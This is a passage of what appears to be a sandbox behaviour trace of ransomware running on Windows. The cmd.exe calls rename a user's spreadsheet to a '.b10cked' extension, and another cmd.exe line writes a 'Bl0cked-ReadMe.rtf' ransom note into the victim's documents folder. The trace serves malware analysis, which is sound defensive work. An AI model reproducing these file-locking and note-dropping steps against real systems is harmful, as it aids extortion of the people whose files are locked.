GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0133.245] _wcsicmp (_String1="move", _String2=")") returned 68 [0133.245] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0133.245] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 
[0133.245] _wcsicmp (_String1="IF", _String2="move") returned -4 [0133.245] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0133.245] _wcsicmp (_String1="REM", _String2="move") returned 5 [0133.245] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0133.248] GetConsoleTitleW (in: lpConsoleTitle=0x1cf6f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.249] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0133.249] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="CD") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0133.249] _wcsicmp (_String1="move", _String2="REN") returned -5 [0133.249] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="SET") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0133.249] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0133.249] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0133.249] _wcsicmp (_String1="move", _String2="MD") returned 11 [0133.249] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0133.249] _wcsicmp (_String1="move", _String2="RD") returned -5 [0133.249] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0133.249] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0133.249] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0133.249] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0133.249] _wcsicmp (_String1="move", _String2="CALL") 
returned 10 [0133.249] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0133.249] _wcsicmp (_String1="move", _String2="VER") returned -9 [0133.249] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0133.249] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0133.249] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0133.249] _wcsicmp (_String1="move", _String2="START") returned -6 [0133.249] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0133.249] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0133.249] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0133.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0133.251] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf4ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf4a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf4a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) 
returned -5 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0133.251] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 
[0133.252] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0133.252] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0133.252] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2=".") returned 62 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2="..") returned 62 [0133.253] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lq~1.xls")) returned 0x20 [0133.253] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1eb0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0133.253] SetErrorMode (uMode=0x0) returned 0x0 [0133.253] SetErrorMode (uMode=0x1) returned 0x0 [0133.253] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", nBufferLength=0x104, lpBuffer=0x1cee34, lpFilePart=0x1cee1c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", lpFilePart=0x1cee1c*="LIM3LQ~1.XLS") returned 0x34 [0133.253] SetErrorMode (uMode=0x0) returned 0x1 [0133.253] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x10 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2=".") returned 62 [0133.253] _wcsicmp (_String1="LIM3LQ~1.XLS", _String2="..") returned 62 [0133.253] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lq~1.xls")) returned 0x20 [0133.253] SetErrorMode (uMode=0x0) returned 0x0 [0133.253] SetErrorMode (uMode=0x1) returned 0x0 [0133.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", nBufferLength=0x104, lpBuffer=0x1cf2b0, lpFilePart=0x1cf048 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", lpFilePart=0x1cf048*="LIM3LQ~1.XLS") returned 0x34 [0133.254] SetErrorMode (uMode=0x0) returned 0x1 [0133.254] SetErrorMode (uMode=0x0) returned 0x0 [0133.254] SetErrorMode (uMode=0x1) returned 0x0 [0133.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", nBufferLength=0x104, lpBuffer=0x1cf4b8, lpFilePart=0x1cf048 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", lpFilePart=0x1cf048*="lim3Lqu-K6HO.xls.b10cked") returned 0x40 [0133.254] SetErrorMode (uMode=0x0) returned 0x1 [0133.254] SetLastError (dwErrCode=0x0) [0133.254] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls.b10cked")) returned 0xffffffff [0133.254] GetLastError () returned 0x2 [0133.254] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x1ce9c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce9c4) returned 0x2d0f10 [0133.254] FindNextFileW (in: hFindFile=0x2d0f10, lpFindFileData=0x1ce9c4 | out: lpFindFileData=0x1ce9c4) returned 0 [0133.255] GetLastError () returned 0x12 [0133.255] FindClose (in: hFindFile=0x2d0f10 | out: hFindFile=0x2d0f10) returned 1 [0133.255] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x2e1c50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1c50) returned 0x2d0f10 [0133.256] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", nBufferLength=0x104, lpBuffer=0x1cec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked", lpFilePart=0x0) returned 0x40 
[0133.256] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls", nBufferLength=0x104, lpBuffer=0x1cec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls", lpFilePart=0x0) returned 0x38 [0133.256] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls")) returned 0x20 [0133.256] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls.b10cked"), dwFlags=0x3) returned 1 [0133.256] FindClose (in: hFindFile=0x2d0f10 | out: hFindFile=0x2d0f10) returned 1 [0133.256] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1cec10 | out: _Buffer=" 1") returned 9 [0133.257] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.257] GetFileType (hFile=0x7) returned 0x2 [0133.451] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0133.452] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ceb9c | out: lpMode=0x1ceb9c) returned 1 [0133.452] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1cebd0 | out: lpConsoleScreenBufferInfo=0x1cebd0) returned 1 [0133.452] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0133.452] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1cec10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0133.452] WriteConsoleW (in: 
hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1cebf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cebf4*=0x1a) returned 1 [0133.452] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.452] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.453] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.453] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.453] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.453] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.453] SetConsoleInputExeNameW () returned 0x1 [0133.453] GetConsoleOutputCP () returned 0x1b5 [0133.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.453] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.453] exit (_Code=0) Process: id = "123" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12817 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12818 
start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12819 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12820 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 12821 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12822 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12823 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12824 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12825 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12826 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12861 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12862 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12863 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000090000" filename = "" Region: id = 12864 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12865 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 12866 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12867 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12868 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12869 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12870 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12871 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12872 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 12873 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12874 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12875 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 12876 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12877 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12878 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 12879 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 12880 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12881 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 12882 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 12883 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 12884 start_va = 0x11a0000 end_va = 0x1302fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 179 os_tid = 0xa40 [0133.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afaf4 | out: lpSystemTimeAsFileTime=0x1afaf4*(dwLowDateTime=0x895eb8e0, dwHighDateTime=0x1d440a9)) [0133.279] GetCurrentProcessId () returned 0xa3c [0133.279] GetCurrentThreadId () returned 0xa40 [0133.279] GetTickCount () returned 0x2a581 [0133.279] QueryPerformanceCounter (in: lpPerformanceCount=0x1afaec | out: lpPerformanceCount=0x1afaec*=19006785388) returned 1 [0133.279] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0133.279] __set_app_type (_Type=0x1) [0133.279] __p__fmode () returned 0x76b331f4 [0133.279] __p__commode () returned 0x76b331fc [0133.279] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0133.280] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0133.280] GetCurrentThreadId () returned 0xa40 [0133.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa40) returned 0x38 [0133.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0133.280] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0133.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa84 | out: phkResult=0x1afa84*=0x0) returned 0x2 [0133.280] VirtualQuery (in: lpAddress=0x1afabb, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.280] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa54, dwLength=0x1c | out: lpBuffer=0x1afa54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.280] GetConsoleOutputCP () returned 0x1b5 [0133.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.281] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0133.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0133.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.281] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0133.281] GetEnvironmentStringsW () 
returned 0x3a0198* [0133.282] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0133.282] GetEnvironmentStringsW () returned 0x3a0198* [0133.282] FreeEnvironmentStringsW (penv=0x3a0198) returned 1 [0133.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9f4 | out: phkResult=0x1ae9f4*=0x40) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0xc0, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x0, lpData=0x1aea00*=0x1, lpcbData=0x1ae9f8*=0x1000) returned 0x2 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x0, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9fc, lpData=0x1aea00, lpcbData=0x1ae9f8*=0x1000 | out: lpType=0x1ae9fc*=0x4, lpData=0x1aea00*=0x40, lpcbData=0x1ae9f8*=0x4) returned 0x0 [0133.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9fc, 